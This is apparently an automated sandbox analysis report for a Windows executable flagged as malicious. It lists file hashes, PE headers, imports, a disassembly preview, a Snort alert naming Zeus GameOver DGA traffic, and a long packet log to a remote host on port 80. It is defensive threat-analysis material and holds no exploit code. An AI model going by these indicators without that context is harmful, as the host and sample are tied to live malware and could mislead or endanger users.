File Type:	ASCII text, with CRLF line terminators
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	low
Preview:	[ZoneTransfer]....ZoneId=0

\Device\Null Download File
Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Size (bytes):	92
Entropy (8bit):	4.300553674183507
Encrypted:	false
MD5:	F74899957624A2837F2F86E8E62E92D4
SHA1:	1FCDAC5DEC5B0B1E00CF0247DA2A5F18566F1431
SHA-256:	507992A303C447D1D40D36E2E5163A237077B94F23A7089AC90A2F08682AE9BC
SHA-512:	E3FD14728633614B6552A75C15079AC8B04C0E8B3F49535B522C73312B1C812E30A934099AB18B507A0B4878068987D5545E90FA3747F7E7B10360EE324DB435
Malicious:	false
Reputation:	low
Preview:	..Waiting for 10 seconds, press CTRL+C to quit ..... 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

Static File Info

General
File type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Entropy (8bit):	6.905956768984892
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	y98WYYcJ2U.exe
File size:	129024
MD5:	18b04e2fd804d553d9a35e088193dea7
SHA1:	f3dfec27d03905211940da451e9ee1ed500abf33
SHA256:	34dea8fb86e0f4d24ce31fb3d0b87d70feea93e48d3e74a3347001ad590f9b43
SHA512:	914a7161d15a23165b3f49b404495f691c35b342bae6cc853bf4bec5a4d8338beb52c9d1de43f5e156e82fa2641726b4c9d015270402b20cd33d36ca467a4391
SSDEEP:	3072:NCvXmrvLTZFAu7bIEwyr2LMN7n2khIDmry5PnIJD:MmrvLTPH7bIEwU2g7nae
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........%#..DM..DM..DM......DM......DM......DM...6..DM..DL.ODM......DM......DM......DM.Rich.DM.........PE..L...C".].................P.

File Icon


Icon Hash:	b28e8ab4bc9cc4f3

Static PE Info

General
Entrypoint:	0x401403
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x5D812243 [Tue Sep 17 18:13:23 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	836e407de03dda57faad6d99acf6865f

Entrypoint Preview

Instruction
call 1E9E990Ah
jmp 1E9E544Eh
mov edi, edi
push ebp
mov ebp, esp
push ecx
push esi
mov esi, dword ptr [ebp+0Ch]
push esi
call 1E9EA3E5h
mov dword ptr [ebp+0Ch], eax
mov eax, dword ptr [esi+0Ch]
pop ecx
test al, 82h
jne 1E9E55E9h
call 1E9E657Dh
mov dword ptr [eax], 00000009h
or dword ptr [esi+0Ch], 20h
or eax, FFFFFFFFh
jmp 1E9E5704h
test al, 40h
je 1E9E55DFh
call 1E9E6562h
mov dword ptr [eax], 00000022h
jmp 1E9E55B5h
push ebx
xor ebx, ebx
test al, 01h
je 1E9E55E8h
mov dword ptr [esi+04h], ebx
test al, 10h
je 1E9E565Dh
mov ecx, dword ptr [esi+08h]
and eax, FFFFFFFEh
mov dword ptr [esi], ecx
mov dword ptr [esi+0Ch], eax
mov eax, dword ptr [esi+0Ch]
and eax, FFFFFFEFh
or eax, 02h
mov dword ptr [esi+0Ch], eax
mov dword ptr [esi+04h], ebx
mov dword ptr [ebp-04h], ebx
test eax, 0000010Ch
jne 1E9E55FEh
call 1E9E6568h
add eax, 20h
cmp esi, eax
je 1E9E55DEh
call 1E9E655Ch
add eax, 40h
cmp esi, eax
jne 1E9E55DFh
push dword ptr [ebp+0Ch]
call 1E9EA2F8h
pop ecx
test eax, eax
jne 1E9E55D9h
push esi
call 1E9EA2A4h
pop ecx
test dword ptr [esi+0Ch], 00000108h
push edi
je 1E9E5656h
mov eax, dword ptr [esi+08h]
mov edi, dword ptr [esi]
lea ecx, dword ptr [eax+01h]
mov dword ptr [esi], ecx

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x178ec	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10c000	0x4d30	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x111000	0x98c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x16000	0x1e8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x14fd0	0x15000	False	0.781610398065	ump; data	7.45545945684	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x16000	0x2408	0x2600	False	0.358758223684	ump; data	5.42081104236	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19000	0xf2248	0x1400	False	0.178515625	ump; data	1.93367089957	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x10c000	0x4d30	0x4e00	False	0.608974358974	ump; data	5.5444505808	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x111000	0x1aaa	0x1c00	False	0.298270089286	ump; data	3.08322465201	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AFX_DIALOG_LAYOUT	0x10f7b0	0x2	ump; 370 XA sysV pure executable
AFX_DIALOG_LAYOUT	0x10f7b8	0x2	ump; data
AFX_DIALOG_LAYOUT	0x10f7c0	0x2	ump; data
SATEGESUXOTADOSOMUDUMOG	0x10f198	0x5c6	ump; ASCII text, with very long lines, with no line terminators
TUWUTAPUGAMOGIF	0x10df18	0x127b	ump; ASCII text, with very long lines, with no line terminators
RT_CURSOR	0x10f7c8	0x130	ump; data
RT_CURSOR	0x10f8f8	0xf0	ump; data
RT_ICON	0x10c5a0	0x8a8	ump; data	Croatian	Croatia
RT_ICON	0x10ce48	0x10a8	ump; data	Croatian	Croatia
RT_STRING	0x10fb48	0x192	ump; data
RT_STRING	0x10fce0	0x44a	ump; data
RT_STRING	0x110130	0x34e	ump; data
RT_STRING	0x110480	0x604	ump; data
RT_STRING	0x110a88	0x2a4	ump; data
RT_GROUP_CURSOR	0x10f9e8	0x22	ump; MS Windows icon resource - 2 icons, 32x32, 2-colors
RT_GROUP_ICON	0x10def0	0x22	ump; MS Windows icon resource - 2 icons, 32x32, 256-colors	Croatian	Croatia
RT_VERSION	0x10fa10	0x138	ump; data
None	0x10f770	0xa	ump; data
None	0x10f780	0xa	ump; data
None	0x10f760	0xa	ump; data
None	0x10f790	0xa	ump; data
None	0x10f7a0	0xa	ump; data

Imports

DLL

Import

KERNEL32.dll

CreateMutexW, SetLocalTime, _llseek, LoadResource, SystemTimeToTzSpecificLocalTime, InterlockedDecrement, ScrollConsoleScreenBufferW, CompareFileTime, CreateJobObjectW, GetUserDefaultLCID, CallNamedPipeW, GetProcessPriorityBoost, GetTickCount, ReadConsoleW, FindActCtxSectionStringA, TzSpecificLocalTimeToSystemTime, TlsSetValue, FindResourceExA, GlobalAlloc, _hread, DeleteVolumeMountPointW, SetConsoleMode, ReadFile, GetBinaryTypeW, lstrlenW, GlobalUnlock, DisconnectNamedPipe, SetVolumeLabelA, FreeLibraryAndExitThread, OpenMutexW, GetLastError, BeginUpdateResourceW, WriteProfileSectionA, EnterCriticalSection, OpenWaitableTimerA, WriteConsoleA, SetCalendarInfoW, BuildCommDCBAndTimeoutsW, GetExitCodeThread, SetFileApisToANSI, VirtualLock, AddAtomA, GlobalHandle, GetPrivateProfileStructA, GetTapeParameters, GetSystemInfo, WaitForMultipleObjects, GlobalWire, EnumDateFormatsA, CreateIoCompletionPort, GetModuleHandleA, EnumResourceNamesA, VirtualProtect, OpenSemaphoreW, SuspendThread, lstrcpyA, SetCurrentDirectoryA, FillConsoleOutputCharacterA, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, LeaveCriticalSection, GetModuleHandleW, Sleep, GetProcAddress, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, RtlUnwind, MultiByteToWideChar, LoadLibraryA, InitializeCriticalSectionAndSpinCount, HeapAlloc, VirtualAlloc, HeapReAlloc, SetStdHandle, GetConsoleOutputCP, WriteConsoleW, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, HeapSize, CreateFileA, CloseHandle

GDI32.dll

GetBitmapBits

Version Infos

Description	Data
FileVer	44.0.0.89
ProductVer	2.0.9.19
Translation	0x0209 0x04e7

Possible Origin

Language of compilation system	Country where language is spoken	Map
Croatian	Croatia

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/13/20-20:56:38.650052	UDP	2018316	ET TROJAN Zeus GameOver Possible DGA NXDOMAIN Responses	53	60913	8.8.8.8	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 13, 2020 20:54:41.589392900 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:41.653752089 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.653922081 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:41.654148102 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:41.654236078 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:41.718322992 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.718516111 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.729074955 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.742604971 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:41.742788076 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:41.806976080 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.821265936 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.821301937 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.821413040 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:41.821414948 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.821434975 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.821449041 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.821461916 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.821469069 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.821475983 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.821481943 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.821487904 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.821585894 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:41.885708094 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.885730028 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.885737896 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.885852098 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:41.885953903 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.885988951 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.886008024 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.886023998 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.886034966 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.886042118 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.886048079 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.886054039 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.886063099 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.886075974 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.886085033 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:41.886090040 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.886100054 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.886183023 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.886188030 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:41.886200905 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.886208057 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.886214018 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.886219978 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.886339903 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:41.950192928 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950205088 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950212002 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950218916 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950226068 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950232029 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950283051 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950299025 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950305939 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950458050 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950468063 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950474977 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950500011 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950508118 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950515032 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950527906 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950571060 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:41.950721979 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:41.950778008 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950788021 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950813055 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950820923 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950828075 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950839043 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950846910 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950858116 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950949907 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950964928 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.950985909 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:41.951071024 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:41.951183081 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.951190948 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.951198101 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.951204062 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.951221943 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.951316118 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.951373100 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.951380968 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.951386929 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.951440096 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.951447964 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.951492071 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.951527119 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.951538086 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:41.951634884 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:41.951709986 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:41.951795101 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.014894962 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.014941931 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.014971018 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.014985085 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.014996052 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015008926 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015017986 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.015019894 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015028954 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015037060 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015106916 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015134096 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015146971 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015152931 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.015156984 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015166044 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015173912 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015261889 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.015269041 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015295982 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015310049 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015327930 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015338898 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015356064 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.015427113 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015439034 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.015450954 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015460968 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015470982 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015558004 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.015608072 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015630007 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015640974 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015682936 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.015777111 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015808105 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015820026 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015830994 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015959978 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.015965939 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.015979052 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.016010046 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.016021013 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.016045094 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.016077042 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.016139984 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.016174078 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.016190052 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.016207933 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.016221046 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.016318083 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.016320944 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.016354084 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.016380072 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.016407967 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.016427040 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.016522884 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.016681910 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.016721964 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.016738892 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.016751051 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.016777992 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.016875982 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.079322100 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.079339027 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.079350948 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.079361916 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.079556942 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.079574108 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.079579115 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.079585075 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.079596043 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.079766035 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.079767942 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.079783916 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.079796076 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.079807043 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.079827070 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.079838991 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.079905987 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.079907894 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.079931021 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.079962969 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.079981089 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.079992056 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080003023 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080039978 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.080100060 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080112934 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080123901 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080135107 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080179930 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.080281973 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080296040 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080307007 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080318928 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080328941 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.080435038 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080449104 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080461025 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080477953 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080499887 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.080614090 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080626965 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.080634117 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080645084 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080655098 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080770016 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:54:42.080795050 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:54:42.080807924 CEST	80	49717	109.94.209.7	192.168.2.3
